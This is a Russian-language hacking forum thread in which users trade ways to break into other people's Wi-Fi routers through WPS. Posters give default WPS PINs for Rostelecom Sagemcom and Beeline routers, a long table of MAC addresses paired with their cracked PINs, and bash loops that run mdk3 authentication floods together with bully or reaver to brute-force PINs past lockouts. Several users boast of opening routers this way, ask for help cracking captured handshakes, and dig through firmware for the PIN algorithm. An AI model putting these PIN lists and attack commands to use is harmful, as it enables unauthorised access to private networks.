Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    тю....ZyXEL 100% пин будет из 16 в 10 :)
     
  2. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    367
    Likes Received:
    163
    Reputations:
    19
    На ADSL2+ модемах от TP-LINK так и есть, жаль что все в основном используют не такие(
     
  3. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    а просто у роутеров TP-LINK пины абсолютно не по принципу 16 в 10,ещё и лочатся,правда если роутеры современные,или прошивки свежие...
     
  4. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    А вот тут не согласен :)
    Для серии роутеров ZyXEL ZyWALL, на которых также есть WPS по умолчанию, этот алгоритм не подходит.
     
  5. СЕРЖ32

    СЕРЖ32 Active Member

    Joined:
    1 Sep 2013
    Messages:
    1,761
    Likes Received:
    101
    Reputations:
    0
    принимается :) потому что не пробовал именно ZyWALL,а только или простые,или lite...
    те что я пробовал,абсолютно у всех пин был с 16 в 10,штук 8 таких ZyXEL открыл :) Все бы только такие точки покупали б :)
     
  6. Z10Y

    Z10Y New Member

    Joined:
    22 Jan 2014
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    Делюсь опытом

    Всем привет =) хочу поделится опытом и нароботками)
    Всеми нами любимый ростелеком предоставляет роутеры фирмы Sagemcom. Зашита у них очень дырявая, они на всех роутерах используют некоторый список Pinов =)
    А именно на старых прошивках такая картина:
    Code:
    4C:17:EB:XX:XX:XX
    E8:F1:B0:XX:XX:XX
    C0:AC:54:XX:XX:XX
    используются пины: 46264848, 76229909, 21464065, 13585907
    Для новой прошивки картина хуже( они стали лочится, нашел только пин для одного вида мас:
    Code:
    7C:03:D8:XX:XX:XX - 10864111
    D8:6C:E9:XX:XX:XX - ????????
    2C:39:96:XX:XX:XX - ???????? 
    3C:81:D8:XX:XX:XX - ???????? 
    Мною именно этими пинами именно эти мак адреса были открыта на 100%, не 1 осечки, кроме новых прошивок! Каждым пином было открыто более 4 роутеров.(даже с новой прошивкой мне извесный мак)
    Так вот, люди если кто пользуется ростелекомом с таким роутером и с маком с неизвесным пином, или уже имеет на руках эти пины поделитесь))))


    Так же имеется небольшая база на роутеры билайна Smart-Box:
    Code:
    00:0E:8F:01:9D:78       	38903663
    00:0E:8F:01:9D:9C            	47300620
    00:0E:8F:01:9E:38       	41579510
    00:0E:8F:01:9E:3C       	36887743
    00:0E:8F:D3:D7:5C       	19552422
    Как видно зависимости на первый взгляд не прослеживается, но она должна быть - это же билайн))))

    так же есть интересный архив с частыми маками:
    Code:
    F0:7D:68:3E:50:0F	28504610
    F0:7D:68:3E:70:76	83869860
    F0:7D:68:3E:B3:BD	11403319
    F0:7D:68:3F:FE:90	29558179
    F0:7D:68:40:C3:7A	02445908
    F0:7D:68:42:9E:FE	16838093
    F0:7D:68:42:A8:00	36103690
    F0:7D:68:42:A9:40	29481262
    F0:7D:68:42:B6:C0	32048988
    F0:7D:68:47:22:20	42562573
    F0:7D:68:48:EA:B0	64577845
    F0:7D:68:48:EB:C2	52857027
    F0:7D:68:48:EB:E6	35826071
    F0:7D:68:48:EC:38	38366932
    F0:7D:68:48:EE:18	46142849
    F0:7D:68:48:EE:E8	04325352
    F0:7D:68:48:EE:F8	28166597
    F0:7D:68:48:EF:14	85466029
    F0:7D:68:50:54:BC	10389928
    F0:7D:68:50:E2:B4	75425081
    F0:7D:68:5B:26:F4	61248939
    F0:7D:68:5B:27:C6	78985742
    F0:7D:68:5B:28:1C	71452401
    F0:7D:68:5B:32:26	75176365
    F0:7D:68:5B:B6:AC	62296045
    F0:7D:68:5B:B8:14	18375848
    F0:7D:68:5B:EC:70	16378315
    F0:7D:68:75:8A:97	51762605
    F0:7D:68:75:CF:19	94783513
    F0:7D:68:81:72:14	41827390
    F0:7D:68:81:7A:D0	70182347
    F0:7D:68:81:B8:8E	26704548
    F0:7D:68:82:3A:32	75682460
    F0:7D:68:82:45:A6	94827644
    F0:7D:68:82:DD:2B	77305862
    F0:7D:68:82:F4:FB	53836908
    F0:7D:68:83:15:0B	07021411
    F0:7D:68:83:1C:C1	97774167
    F0:7D:68:88:8D:AC	76454622
    F0:7D:68:8A:9F:EA	44505530
    F0:7D:68:8A:A8:48	76433443
    F0:7D:68:8C:58:B2	03422045
    F0:7D:68:8C:5C:7C	73972396
    F0:7D:68:8C:5C:86	96076972
    F0:7D:68:8C:6C:A6	28712237
    F0:7D:68:8C:6D:8C	74275724
    F0:7D:68:8C:6E:90	35967163
    F0:7D:68:8D:F0:22	77387097
    F0:7D:68:8D:F0:6A	88899367
    F0:7D:68:95:30:1E	06329464
    F0:7D:68:95:B2:F2	76563287
    F0:7D:68:97:C0:D6	56194760
    F0:7D:68:97:C0:DC	79133067
    F0:7D:68:9B:19:D2	83948398
    F0:7D:68:9B:37:42	80514367
    F0:7D:68:9B:62:FE	77912954
    F0:7D:68:9B:C5:DD	51965334
    F0:7D:68:9B:DA:E9	02415635
    F0:7D:68:9B:F5:C8	31143769
    F0:7D:68:A0:68:BA	29454785
    F0:7D:68:A1:66:B0	26639451
    Code:
    F8:1A:67:8A:F1:04	06695972
    F8:1A:67:97:22:18	78488113
    F8:1A:67:C3:B3:90 	92407213
    F8:1A:67:CB:4F:E6	68474836
    F8:1A:67:CB:53:D0	14721359
    F8:1A:67:CB:57:FC	88821344
    F8:1A:67:CC:E7:44	50042227
    F8:1A:67:EC:91:EE	36735600
    F8:1A:67:EC:99:3E	04165415
    F8:1A:67:F8:40:F4 	65597231

    Вот) Такие у меня дела) считаю что все пины строятся по какой то логике))) надо ток ее просеч)))
     
    #1546 Z10Y, 24 Jan 2014
    Last edited: 24 Jan 2014
    uzeerpc likes this.
  7. Z10Y

    Z10Y New Member

    Joined:
    22 Jan 2014
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    Люди, кто знает,прошивка на роутеры пишется на асемблере???
     
  8. tr1ckyBiT

    tr1ckyBiT Member

    Joined:
    21 Jan 2014
    Messages:
    27
    Likes Received:
    15
    Reputations:
    1
    Хорошие выборки, особенно первая. Если там нету шума, можна попробовать поддать ее статистическому анализу в MathLab'е, а вось и найдется какая-нибудь закономерность.

    ---
    Читал что для таких устройств как роутеры ассемблер самый подходящий язык программирования; но прежде чем копаться в этих исходниках, много полезного можно почерпнуть в файловой системе роутера , ядре и загрузчике. На многих девайсах стоит OS MIPS Linux и загрузчик U-Boot, которые хорошо документированы, что облегчает реверсинг.
     
  9. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Загрузчик скорее всего на ассемблере пишут, ну а ядро Linux и остальное ПО, в нём живущее - для этого есть кросс-компилятор gcc на архитектуру MIPS.

    Где-то видел статью, в которой был приведён пример написания Hello World на C++ для роутера.
     
    dopetik likes this.
  10. VasiliyP

    VasiliyP Elder - Старейшина

    Joined:
    30 Aug 2011
    Messages:
    365
    Likes Received:
    676
    Reputations:
    11
    Вы хотите поковырять прошивку на предмет алгоритма генерации пинов? Теоретически, он там может быть, для сброса пина в заводское состояние, когда юзер жмет соответствующую кнопку. Если производитель на у себя сайте выкладывает прошивки, можно попробовать ее распаковать при помощи "Firmware Modification Kit" и поискать соответствующий код. А если не выкладывает, то нужно думать, как ее вытащить из роутера:)
     
  11. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    С этими параметрами на одной точке выдаёт WPS transaction failed (code: 0x03), re-trying last ping, а на другой-[!] WARNING: Receive timeout occurred. Что посоветуеш?
     
  12. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,717
    Likes Received:
    10,195
    Reputations:
    126
    Сигнал слабый, увеличить задержку перебора.
     
  13. ohoo

    ohoo New Member

    Joined:
    26 Dec 2013
    Messages:
    42
    Likes Received:
    2
    Reputations:
    0
    while true
    do
    timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m
    sleep 10
    timeout -s SIGINT 60s bully -b XX:XX:XX:XX:XX:XX -v 3 -S -C -L -c 1,2,3,4,5,6,7,8,9,10,11,12,13 mon0
    sleep 3
    done

    эта команда от кали линукс а как запустить эту команду в бектреке?
     
    #1553 ohoo, 25 Jan 2014
    Last edited: 25 Jan 2014
  14. toro

    toro New Member

    Joined:
    25 Oct 2012
    Messages:
    82
    Likes Received:
    0
    Reputations:
    0
    pin для 10:fe:ed знает кто?
     
  15. Z10Y

    Z10Y New Member

    Joined:
    22 Jan 2014
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    Конкретного пина нет! Алгоритмом 16->10 и его модификациями не вычислить! Ищем зависимость а пока что хендшейки лови =)
     
    dopetik likes this.
  16. toro

    toro New Member

    Joined:
    25 Oct 2012
    Messages:
    82
    Likes Received:
    0
    Reputations:
    0
    поймал куда можно обратиться о помощи помочь расшифровать ?
     
  17. Z10Y

    Z10Y New Member

    Joined:
    22 Jan 2014
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    на форуме тема есть... ищи в этом разделе
     
  18. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,817
    Likes Received:
    18,486
    Reputations:
    377
    Вот сюда.
     
    _________________________
    quite gray likes this.
  19. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Если не трудно-объясни какую задержку можно менять и в каких пределах желательно. И ещё-при работе MDK3 переодически пишет, что какая-то частота неизвестная (или не поддерживается) Device is still responding with 2000 clients connected!
    Connecting Client: 00:09:5B:02:FF:4C to target AP: A0:F3:C1:58:16:50
    Connecting Client: 00:09:5B:5B:17:08 to target AP: A0:F3:C1:58:16:50
    AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
    Device is still responding with 2500 clients connected!
    Connecting Client: 00:04:5A:2D:80:1A to target AP: A0:F3:C1:58:16:50
    Connecting Client: 00:09:7C:E9:6D:92 to target AP: A0:F3:C1:58:16:50
    AP A0:F3:C1:58:16:50 seems to be INVULNERABLE!
    Device is still responding with 3000 clients connected!
    Connecting Client: 00:40:01:86:FD:89 to target AP: A0:F3:C1:58:16:50
    Packets sent: 3122 - Speed: 231 packets/sec[X] Unknown frequency '-613135872' reported by interface 'mon0'. Это в случае с BULLY. А в случае while true; do timeout -s SIGINT 60s reaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv -N -s /etc/reaver/XXXXXXXXXXXX.wpc -L; sleep 3; timeout 15s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -s 200 -m; sleep 10; done; получаю как указал в предыдущем сообщении, после которого советуеш увеличить задержку. Заблаговременно спасибо.
     
    #1559 vedemur, 26 Jan 2014
    Last edited: 26 Jan 2014
  20. Z10Y

    Z10Y New Member

    Joined:
    22 Jan 2014
    Messages:
    23
    Likes Received:
    3
    Reputations:
    0
    Люди помощь требуется)
    вот что надыбал в последней прошивки роутера ростелекома sagemcom

    Code:
    var WscDevPin    = '<%ejGetWl(wlWscDevPin)%>';  
    var WscStaPin     = '<%ejGetWl(wlWscStaPin)%>';  
    var WscMode       = '<%ejGetWl(wlWscMode)%>';  
    var WscIRMode   = '<%ejGetWl(wlWscIRMode)%>'; 
    var WscAPMode  = '<%ejGetWl(wlWscAPMode)%>';  
    var sessionKey='<%ejGetOther(sessionKey)%>';  
    var WscCfgMethod = '<%ejGetWl(wlWscCfgMethod)%>';  
    var WscVer2 = '<%ejGetWl(wlWscVer2)%>';  
    var WscIsForceWpsDisable = '<%ejGetWl(wlIsForceWpsDisable)%>';   
    var phy = '<%ejGetWl(wlPhyType)%>';   
    var nmode = '<%ejGetWl(wlNmode)%>';   
    var wlWapiAvail = '<%ejGetWl(wlWapiAvail)%>';  
    var preAuthMode;
    Вот еще!

    Значение берется отсюда wlWscDevPin, как сюда проникнуть кто знает? Может быть есть какой нибудь эмулятор роутера, с возможностью менять mac адрес, просто на него запилить эту прошивку и посмотреть как себя поведет) Но ток мне кажется это фантастика) Что делать?) HELP


    PS искал подробности о ejGetWl() но безуспешно(


    вся прошивка
     
    #1560 Z10Y, 26 Jan 2014
    Last edited: 26 Jan 2014